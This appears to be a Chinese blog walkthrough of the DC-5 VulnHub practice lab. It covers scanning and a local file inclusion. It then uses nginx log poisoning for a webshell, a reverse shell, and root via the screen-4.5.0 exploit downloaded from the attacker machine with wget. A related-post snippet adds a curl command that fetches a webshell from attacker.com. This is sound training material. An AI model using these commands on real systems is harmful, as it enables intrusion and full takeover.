DC-5靶场

已于 2023-10-31 10:33:27 修改
阅读量692 收藏 2
点赞数 3
文章标签: web安全 网络安全
于 2022-12-14 13:44:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhx836161547/article/details/128313056
版权

目录

简介

dc系列靶场是比较适合新手的黑盒测试靶场,其中dc-5靶场下载连接如下

dc-5靶场下载地址

一.找IP地址

①netdiscover #扫内网
②nmap -sP 网段

这里采用方法①👇
在这里插入图片描述

扫出IP地址为:192.168.43.143

二.扫描IP端口

nmap -A -p- -T4 192.168.43.143

结果如下:
在这里插入图片描述

发现80端口开放,因此用浏览器访问

在这里插入图片描述

三.找web漏洞(文件包含)

看到网站,目录扫描查看目录结构
在这里插入图片描述

一个个网站去访问,最后发现在contact.php页面提交表单之后的thankyou.php文件包含了footer.php文件
再加上如图:
在这里插入图片描述

我们试着用伪协议去传参尝试一下文件包含

http://192.168.43.143/thankyou.php?file=/etc/passwd

成功文件包含
在这里插入图片描述

为什么要去访问/etc/passwd: 因为这个文件是系统用户配置文件,存储系统中所有用户的基本信息,并且所有用户都可以对此文件执行读操作

接下来我们就能用filter协议去访问文件源码

http://192.168.43.143/thankyou.php?file=php://filter/read=convert.base64-encode/resource=index.php

在这里插入图片描述

但一个个去看源码对于这个靶场有些许麻烦

四.拿webshell

通过wappalyzer来查看网站版本为nginx1.6.2,对应版本的日志文件在/var/log/nginx/error.log下 ,因为被执行的内容都会被日志文件记录下来,因此,我们可以执行一句话木马,从而让一句话木马出现在日志文件里面,

抓包发送一句话木马
在这里插入图片描述

发送一句话木马后,然后根据蚁剑来连接拿到webshell
在这里插入图片描述

成功连接webshell
在这里插入图片描述

将shell反弹到kali上便于操作
kali监听4444端口:
在这里插入图片描述

然后蚁剑打开webshell去反弹
在这里插入图片描述

连接成功,查看当前目录下的文件:

在这里插入图片描述

在这里插入图片描述

五.提权

尝试提权:

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

发现有一个screen-4.5.0,我们去kali的漏洞库搜索一下

searchsploit screen 4.5.0

在这里插入图片描述

看到存在漏洞,我们去查看一下漏洞的具体利用方法
注意:这里漏洞后侧显示的路径的根路径在/usr/share/exploitdb/exploits
先把指定文件复制到桌面上
cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh
然后在桌面上用vim打开文件
在这里插入图片描述

存储成三部分文件之后,把文件上传到靶场
注意这里,建议把.c文件上传到dc-5上,再去gcc编译,如果直接用kali的gcc编译后将编译后的文件上传上去,可能会导致dc5.sh文件在靶场shell运行的时候报错:未找到xxx版本的glibc
先在kali上监听端口5566,然后通过靶场的shell去下载文件
在这里插入图片描述

跳转到tmp文件夹下,用wget下到这个文件夹里面
为什么要利用tmp文件夹,因为普通用户在tmp文件夹下有较高的权限

wget 192.168.43.129:5566/libhax.c
wget 192.168.43.129:5566/rootshell.c
wget 192.168.43.129:5566/dc5.sh

下完之后,在这里直接gcc编译.c文件

gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c

编译完执行shell脚本

chmod +x dc5.sh 赋予dc5.sh执行文件的权限
./dc5.sh

最后
whoami 查看是否提权成功
提权成功
cd /root 发现有flag文件,成功拿到flag

总结

关键点①:
如何判断文件包含 thankyou.php文件包含footer.php
如何验证文件包含 file =/etc/passwd
如何去利用文件包含 :
去找到文件源码,从源码中找信息
但由于是nginx1.6.2,有一个error.log,因此可以利用一句话木马
关键点②:
提权:screnn4.5.0
如何去利用,searchsploit去寻找这个漏洞相关信息
帮助文档能看懂
如何去下载文件
开一个端口,让其它主机去访问这个端口从而下载文件

IDgoodis
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶场库中 DC:1
07-06
针对初学者对vulnhub靶场库中DC:1有一定的认知和了解,你会学到一些东西的
DC-5靶场渗透】
一纸荒芜的博客
07-04 1509
DC-5 靶场
DC-5靶机
最新发布
mlws1900的博客
03-25 598
得知文件包含漏洞,我们可以在ssh日志,中间件日志以及临时文件中写入一句话木马然后进行包含,即可解析。我们可以利用nginx日志写入一句话木马。切换nat模式,有问题全选重试和是,打到这了,我感觉这个配置我都不用写了,启动靶机如下图所示即可。啥玩意没有,点击contact,发现一个留言板,测试了xss啥也没有。以上操作要在bp中发包,我直接在浏览器中修改,不知道为什么无法写入。如上图所示,我试了在浏览器中无法写入日志,打开蚁剑连接shell。上面那个没试过,下面这个试了成功, 都需要在bp中进行操作。
DC靶场系列--DC1
BGiscool的博客
06-28 4469
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
DC-8靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-08 3051
dc-8靶场详细渗透过程
靶机6 DC-5(过程超详细)
honest_gg的博客
09-26 745
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
Vulnhub系列之DC5靶场详解
weixin_50053818的博客
05-13 1581
文章目录环境文件包含突破点screen提权 环境 vulhub系列之DC5靶场 VMware虚拟机 kali 文件包含突破点 根据目标靶机MAC地址得到靶机IP为192.168.43.160,直接上nmap扫描。 发现开放了80、111、36936端口,暂时只知道端口80是web站点,另外两个端口未知。其他无头绪,直接访问网页。 进入网页,一堆的英文,看了一下内容发现没有什么用,只有Contact页面有几个输入点,经过SQL注入和XSS测试,没有发现相关漏洞。 卡了半天没有找到什么突破点了,所以尝试
DC系列漏洞靶场-渗透测试学习复现(DC-4)
W983079520的博客
12-02 1125
DC-4是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-4靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。 4 访
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-07 1893
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
vulnhub靶场DC-5
kukudeshuo的博客
07-13 466
vulnhub靶场DC-5 环境准备 攻击机:kali(192.168.58.130) 靶机:DC-5(192.168.58.148) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.148 使用nmap扫描查看目标靶机端口开放情况 开放端口:80、111、55980 web容器:nginx 浏览器访问目标靶机80端口 就只是一些文字,没
DC5靶场
qq_60848021的博客
09-19 1063
由上可以知道web服务器是nginx1.6.2,客户端向nginx服务器发送的每一条请求都会记录在访问日志上(客户端IP,浏览器信息,referer,请求处理时间,请求URL等都可以在访问日志中得到)。GNU Screen是一款由GNU计划开发的用于命令行终端切换的自由软件。它提供了统一的管理多个会话的界面和相应的功能。由以上可知道thankkyou.php调用footer.php,可能存在文件包含漏洞。正确的是:file=
DC5-目录传参爆破字典
12-18
DC5主机靶场文件包含漏洞的数据包传参的函数字典
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
靶场系列之DC-1.md
07-26
靶场系列之DC-1.md
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
DVWA靶场的简介、下载与安装
热门推荐
WX公众号-小白学安全
04-01 1万+
文章目录简介下载地址安装 简介 DVWA(Damn Vulnerable Web Application)一个用来进行安全脆弱性鉴定的PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA 一共包含了十个攻击模块,分别是:Brute Force(暴力(破解))、Command Injection(命令行注入)、CSRF(跨站请求伪造)、- File Inclusion(文件包含)、File Upload(文件
2022-渗透测试-DC靶场的下载、安装与访问
保持微笑的博客
02-03 4733
目录 1.DC靶场下载 2.DC靶场的安装 3.DC靶场的访问 1.DC靶场下载 下载链接如下 Vulnerable By Design - Search: dc (Page 2) ~ VulnHubhttps://www.vulnhub.com/?page=2&q=dcDC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。 2.DC靶场的安装 以DC-1为例,将文件解压。 打开虚拟机,选择解压好的文件 导入虚拟机 ...
DC-6靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-02 1323
dc-6靶场详细渗透过程
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值